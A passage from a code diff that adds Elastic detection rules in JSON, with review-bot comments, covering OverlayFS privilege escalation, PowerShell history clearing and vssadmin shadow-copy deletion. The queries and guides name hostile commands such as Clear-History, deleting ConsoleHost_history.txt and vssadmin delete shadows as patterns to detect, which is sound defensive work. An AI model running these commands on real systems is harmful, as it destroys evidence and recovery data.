If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "b4449455-f986-4b5a-82ed-e36b129331f7_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_5.json b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_5.json new file mode 100644 index 00000000000..25093989b9f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_5.json 
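Review bot: The query's exclusions `not process.name:(Atom or xpcproxy) and not user.name:root` are not explained anywhere in the rule, and the file carries no `note` or `false_positives` entry, so an analyst tuning it cannot tell whether the root exclusion is a deliberate noise trade-off or an accepted coverage gap; as written, an edit to a user's `init.coffee` performed under the root account produces no alert. A one-line `false_positives` entry such as `Edits made by the Atom application itself and by the root account are excluded by the query; revisit these exclusions if Atom is run with elevated privileges in your environment.` would make that trade-off explicit. The `setup` text also writes `MacOS` in one step while the tag uses `macOS`, a minor wording inconsistency.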
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to exploit a local privilege escalation (CVE-2023-2640 and CVE-2023-32629) via a flaw in Ubuntu's modifications to OverlayFS. These flaws allow the creation of specialized executables, which, upon execution, grant the ability to escalate privileges to root on the affected machine.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via OverlayFS", + "query": "sequence by process.parent.entity_id, host.id with maxspan=5s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.name == \"unshare\" and process.args : (\"-r\", \"-rm\", \"m\") and process.args : \"*cap_setuid*\" and user.id != \"0\"]\n [process where host.os.type == \"linux\" and event.action == \"uid_change\" and event.type == \"change\" and \n user.id == \"0\"]\n", + "references": [ + "https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability", + "https://twitter.com/liadeliyahu/status/1684841527959273472" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b51dbc92-84e2-4af1-ba47-65183fcd0c57", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### 
Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "b51dbc92-84e2-4af1-ba47-65183fcd0c57_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_110.json b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_110.json new file mode 100644 index 00000000000..ae15c5e9190 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_110.json 
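Review bot: Unlike the other EQL rules in this batch, this one sets no `timestamp_override`, so the `from: now-9m` window is evaluated against `@timestamp` rather than `event.ingested`; endpoint events that arrive with ingest delay larger than the lookback can be missed, which matters for a `sequence ... with maxspan=5s` rule where both events must land inside the window. Adding `"timestamp_override": "event.ingested"` next to `"type": "eql"` would align it with the sibling rules. Separately, the `setup` text links to the pinned `fleet/8.10/agent-policy.html` page while the other rules link `fleet/current/`; the pinned URL will go stale as releases move on.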
@@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Clearing Windows Console History", + "note": "## Triage and analysis\n\n### Investigating Clearing Windows Console History\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can try to cover their tracks by clearing PowerShell console history. PowerShell has two different ways of logging commands: the built-in history and the command history managed by the PSReadLine module. This rule looks for the execution of commands that can clear the built-in PowerShell logs or delete the `ConsoleHost_history.txt` file.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the PowerShell logs on the SIEM to determine if there was suspicious behavior that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n - Ensure that PowerShell auditing policies and log collection are in place to grant future visibility.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name == \"PowerShell.EXE\") and\n (process.args : \"*Clear-History*\" or\n (process.args : (\"*Remove-Item*\", \"rm\") and process.args : (\"*ConsoleHost_history.txt*\", \"*(Get-PSReadlineOption).HistorySavePath*\")) or\n (process.args : \"*Set-PSReadlineOption*\" and process.args : \"*SaveNothing*\"))\n", + "references": [ + "https://stefanos.cloud/kb/how-to-clear-the-powershell-command-history/", + "https://www.shellhacks.com/clear-history-powershell/", + "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for 
versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.003", + "name": "Clear Command History", + "reference": "https://attack.mitre.org/techniques/T1070/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "b5877334-677f-4fb9-86d5-a9721274223b_110", + "type": "security-rule" +} \ No newline at end of file 
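Review bot: The query depends entirely on `process.args` (`*Clear-History*`, `*ConsoleHost_history.txt*`, `*SaveNothing*`), but for the `winlogbeat-*` and `logs-system.security*` indices those values are only populated when Windows process-creation auditing includes the command line; the `setup` section covers the `event.ingested` pipeline caveat yet says nothing about that prerequisite, so on a default Windows audit policy the rule is silently blind on those sources. A sentence in `setup` such as `For Windows Security event sources, enable "Include command line in process creation events" under Audit Process Creation so that process.args is populated.` would close that gap. The same applies to the `_111` revision of this rule in the next file section, which only narrows the endpoint index pattern. Also, the wildcard `*Clear-History*` matches any command line containing that substring, including help lookups or scripts that merely mention the cmdlet, so the false-positive section's claim that the activity is "unlikely to happen legitimately" is somewhat optimistic.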
diff --git a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_111.json b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_111.json new file mode 100644 index 00000000000..553bbb958c4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_111.json 
@@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Clearing Windows Console History", + "note": "## Triage and analysis\n\n### Investigating Clearing Windows Console History\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can try to cover their tracks by clearing PowerShell console history. PowerShell has two different ways of logging commands: the built-in history and the command history managed by the PSReadLine module. This rule looks for the execution of commands that can clear the built-in PowerShell logs or delete the `ConsoleHost_history.txt` file.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the PowerShell logs on the SIEM to determine if there was suspicious behavior that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n - Ensure that PowerShell auditing policies and log collection are in place to grant future visibility.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name == \"PowerShell.EXE\") and\n (process.args : \"*Clear-History*\" or\n (process.args : (\"*Remove-Item*\", \"rm\") and process.args : (\"*ConsoleHost_history.txt*\", \"*(Get-PSReadlineOption).HistorySavePath*\")) or\n (process.args : \"*Set-PSReadlineOption*\" and process.args : \"*SaveNothing*\"))\n", + "references": [ + "https://stefanos.cloud/kb/how-to-clear-the-powershell-command-history/", + "https://www.shellhacks.com/clear-history-powershell/", + "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for 
versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.003", + "name": "Clear Command History", + "reference": "https://attack.mitre.org/techniques/T1070/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "b5877334-677f-4fb9-86d5-a9721274223b_111", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_110.json b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_110.json new file mode 100644 index 00000000000..d86206e72fb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_110.json 
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of vssadmin.exe for shadow copy deletion or resizing on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Volume Shadow Copy Deleted or Resized via VssAdmin", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deleted or Resized via VssAdmin\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring.\n\nThis rule monitors the execution of Vssadmin.exe to either delete or resize shadow copies.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule may produce benign true positives (B-TPs). 
If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\"\n and (process.name : \"vssadmin.exe\" or ?process.pe.original_file_name == \"VSSADMIN.EXE\") and\n process.args in (\"delete\", \"resize\") and process.args : \"shadows*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + 
"Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_111.json b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_111.json new file mode 100644 index 00000000000..255240236fc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_111.json 
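Review bot: The `### Related rules` section of `note` lists the rule itself — `Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921` is this rule's own `rule_id` — so the only genuinely related entry is the PowerShell one; the self-reference should be dropped or replaced with the rule the author intended. On the query, `process.args in ("delete", "resize")` is the case-sensitive form of the operator while the surrounding clauses use the case-insensitive `:`; writing it as `process.args : ("delete", "resize")` (or `in~`) keeps matching consistent with the rest of the rule. The investigation guide also contains a stray blank line before `### False positive analysis`, which renders as an extra paragraph break.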
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of vssadmin.exe for shadow copy deletion or resizing on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Volume Shadow Copy Deleted or Resized via VssAdmin", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deleted or Resized via VssAdmin\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring.\n\nThis rule monitors the execution of Vssadmin.exe to either delete or resize shadow copies.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule may produce benign true positives (B-TPs). 
If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\"\n and (process.name : \"vssadmin.exe\" or ?process.pe.original_file_name == \"VSSADMIN.EXE\") and\n process.args in (\"delete\", \"resize\") and process.args : \"shadows*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + 
